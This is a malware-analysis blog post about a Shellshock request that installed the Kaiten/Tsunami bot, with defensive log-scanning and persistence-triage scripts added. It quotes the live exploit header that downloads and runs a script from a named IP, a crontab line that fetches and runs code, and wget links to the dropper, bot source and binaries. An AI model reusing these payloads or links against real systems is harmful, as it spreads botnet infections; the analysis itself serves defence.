Greetings,
This blog post brought to you in part by: MalwareMustDie. I must thank them for their assistance on this one.
Today I came in and found around 300+ Shellshock payloads. As I groggily looked through most of them, noting the same old vulnerability touches and payloads already documented in project OverWatch, I found an alert that caught my eye:
5.249.147.134 threw this at me:
GET /nodeworx/ HTTP/1.0
HOST:xxx.xxx.xxx.xxx:2443
User-Agent: () { :;}; /bin/bash -c "curl -o /tmp/.a http://205.237.100.171/manual/init;fetch -o /tmp/.a http://205.237.100.171/manual/init;wget http://205.237.100.171/manual/init -O /tmp/.a;sh /tmp/.a;rm -rf /tmp/.a"
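As an added example that is not part of the original post, here is a small POSIX shell script that flags requests like the one above in a web server access log and lists the download hosts they reference, so they can be blocked and the payloads pulled for analysis. The log lines it runs on are constructed, and the addresses in them are documentation ranges rather than the ones from the post.

```shell
#!/bin/sh
# Added example (not part of the original post): flag Shellshock-style
# requests in an access log and list the download hosts they reference.
# SAMPLE_LOG is constructed test data modelled on the request above;
# its addresses are documentation ranges, not the ones from the post.

SAMPLE_LOG='192.0.2.10 - - [25/Sep/2014:08:01:12 +0000] "GET /nodeworx/ HTTP/1.0" 404 209 "-" "() { :;}; /bin/bash -c \"curl -o /tmp/.a http://203.0.113.5/manual/init;wget http://203.0.113.5/manual/init -O /tmp/.a;sh /tmp/.a\""
192.0.2.11 - - [25/Sep/2014:08:01:13 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
192.0.2.12 - - [25/Sep/2014:08:02:44 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "() { :; }; echo vulnerable"'

# shellshock_lines: read a log on stdin and print the lines carrying the
# Shellshock trigger, a header value that begins with "() {". Whatever
# follows that prefix is the command a vulnerable bash would run.
shellshock_lines() {
    grep -F '() {'
}

# payload_hosts: deduplicated hosts of the URLs found in flagged lines.
# A URL ends at whitespace, ';', a quote or a backslash (escaped quote).
payload_hosts() {
    shellshock_lines |
        grep -oE 'https?://[^ ;"\\]+' |
        sed -E 's#^https?://([^/]+).*$#\1#' |
        sort -u
}

# Run on the constructed sample; feed a real access log on stdin instead.
printf '%s\n' "$SAMPLE_LOG" | shellshock_lines
printf '%s\n' "$SAMPLE_LOG" | payload_hosts
```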
Awesome. A new toy to play with. Let's pull down the payload:
wget http://205.237.100.171/manual/init
It looks like a shell script. Reading through it reveals the following:
1) Attempts to install gcc and php (both via yum or apt-get, to ensure maximum spread across Linux distros?)
2) Adds 4.2.2.2 (Level 3 Communications' public DNS server, commonly used worldwide) as a DNS server in resolv.conf to ensure domain name resolution.
3) Appends the line "wget http://stablehost.us/bots/regular.bot" to either /etc/rc.d/init.d/sshd or /etc/init.d/ssh.
-- This file, "regular.bot", is a persistence mechanism. It instructs the machine to download a.c from 205.237.100.171, compile it into a binary in /tmp, execute it and delete it. This ensures persistence, and if the source code is changed (say, to reflect a new CnC), the bot is updated.
4) Several pre-compiled builds of the same bot for different platforms are downloaded and execution is attempted. Additionally, the source file "a.c" is downloaded by this script, compiled, and executed.
5) To further enable persistence, this line is added to root's crontab:
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
Just like the lines appended to ssh and sshd, this is a persistence mechanism. What's interesting is this line:
chattr +isa /var/spool/cron/tabs/root
+i makes the file immutable. This is a common persistence mechanism for penetration testers. The file cannot be deleted (or modified) in any way until the +i flag is removed, and because chattr (change attribute) is so uncommon, most won't think to look for it or know how to remove it. Tip: lsattr lists the chattr attributes on a file.
+s ensures secure deletion (the file's blocks are zeroed) if the file is ever deleted.
+a makes the file append-only: it can only be opened for writing in append mode.
6) Finally, a cron.weekly entry named "00logrotate" is created that performs the same actions as the weekly root crontab entry, and gets the same chattr +isa treatment.
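As an added example, not the post's or the dropper's own code, here is a POSIX shell triage script that checks a host for the persistence described in the list above: the indicator strings and file paths come from the post, while the Debian location of root's crontab is an assumption I added.

```shell
#!/bin/sh
# Added example, not from the original post: triage checks for the
# persistence the dropper sets up, built from the paths and strings quoted
# above. Run scan_persistence with no arguments as root on a suspect host;
# pass file paths to check specific files instead.
# Indicators from the dropper: persistence script, payload host, and the
# DNS server it forces into resolv.conf.
IOC_PATTERN='stablehost\.us/bots/regular\.bot|205\.237\.100\.171|nameserver 4\.2\.2\.2'
# Files it appends to or creates (paths from the post, plus the Debian
# location of root's crontab, an assumption added here).
PERSIST_FILES='/etc/rc.d/init.d/sshd /etc/init.d/ssh /etc/cron.weekly/00logrotate
/var/spool/cron/tabs/root /var/spool/cron/crontabs/root /etc/resolv.conf'

# ioc_hits FILE: print matching lines with line numbers; 0 if any matched.
ioc_hits() {
    [ -r "$1" ] && grep -nE "$IOC_PATTERN" "$1"
}

# has_isa_flags "LSATTR_LINE": 0 when the flags field carries both i
# (immutable) and a (append-only), the "chattr +isa" signature. lsattr
# prints flags in a fixed order with i before a, e.g. "----ia----e--".
has_isa_flags() {
    case ${1%% *} in *i*a*) return 0 ;; esac
    return 1
}

# locked_down FILE: 0 if lsattr reports that combination on FILE.
locked_down() {
    command -v lsattr >/dev/null 2>&1 || return 1
    line=$(lsattr -d "$1" 2>/dev/null) || return 1
    has_isa_flags "$line"
}
# scan_persistence [FILE...]: one IOC/ATTR line per finding; returns 0 if
# anything was found. Defaults to PERSIST_FILES.
scan_persistence() {
    hits=0
    for f in ${*:-$PERSIST_FILES}; do
        if out=$(ioc_hits "$f"); then
            printf 'IOC  %s:\n%s\n' "$f" "$out"; hits=$((hits + 1))
        fi
        if locked_down "$f"; then
            printf 'ATTR %s is immutable/append-only (clear with chattr -ia)\n' "$f"
            hits=$((hits + 1))
        fi
    done
    [ "$hits" -gt 0 ]
}

scan_persistence || echo 'no persistence indicators found'
```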
What gets me is that these actors go to such lengths for persistence, but then COMPLETELY FAIL to protect the source code for their bot (zero obfuscation), fail to statically compile the bot in case the required libs are NOT on the system, etc. Their loss is our gain.
Here are some links for the curious:
wget http://205.237.100.171/manual/init <-- main script
wget http://stablehost.us/bots/regular.bot <-- persistence script
wget http://205.237.100.171/manual/a.c <-- kaiten bot source code
wget http://205.237.100.171/manual/b <-- x86_64 compilation
wget http://205.237.100.171/manual/arm <-- ARM compilation
wget http://205.237.100.171/manual/mipsel1 <-- MIPS compilation
wget http://205.237.100.171/manual/dh <-- see below.. this one is fun.
wget http://205.237.100.171/manual/tmp.gz <-- see below.. more fun!
I submitted the sha1sum of the file "b" to VirusTotal to see if it was already uploaded. Looks like someone beat me to the punch by a few hours:
https://www.virustotal.com/en/file/0f83934ec16c40aea7877f5faedc2b935e3d881e9a2cde36e7fe163cdea3723b/analysis/
VT says this bot is known as Kaiten/Tsunami, no doubt in reference to the source code and/or the tsunami DDoS attack the bot can perform.
The ARM/MIPS variants were a bit of a concern to me. This is one of the few times outside of the Zollard botnet that I've seen a bot precompiled for other CPU architectures, ARM and MIPS in this case.
It is worrying because, while Shellshock has been patched on a wide variety of major platforms, embedded and/or SOHO devices that ship the bash shell remain vulnerable to Shellshock and will likely remain so indefinitely in most cases.
I decided to consult with MMD on this case, as I recall hearing about Tsunami/Kaiten through them a while ago. It appears that this is commonplace for the Kaiten botnet, and the source code is there to allow compilation on any platform. Additionally, they made me aware of other payloads the bot is capable of delivering for spreading deeper into targeted networks:
The dh file above is a variant of the Shellshock-over-DHCP exploit that has already been seen from TrustedSec as a Perl module. If this were loaded on a SOHO device/router in a target network, the avenue for exploitation and pivoting deeper into the network would be much greater... if that device has a Python interpreter.
The tmp.gz file is actually a tar.gz file. It contains pnscan, a port scanner commonly packaged with DDoS bots. Additionally, this tarball contains bash.php, a PHP script holding the initial exploit payload, which points to 205.237.100.171/init via Shellshock exploitation. If you want the payload, grab it now; I'm following up with the provider for that IP address to get this remediated as soon as possible.
The C source mentions x.secureshellz.net. I'm fairly certain this is, or was, the botnet CnC. I couldn't connect to it via irssi. I may need to detonate it later to confirm.
Happy Hunting,
WeAreTheArtillery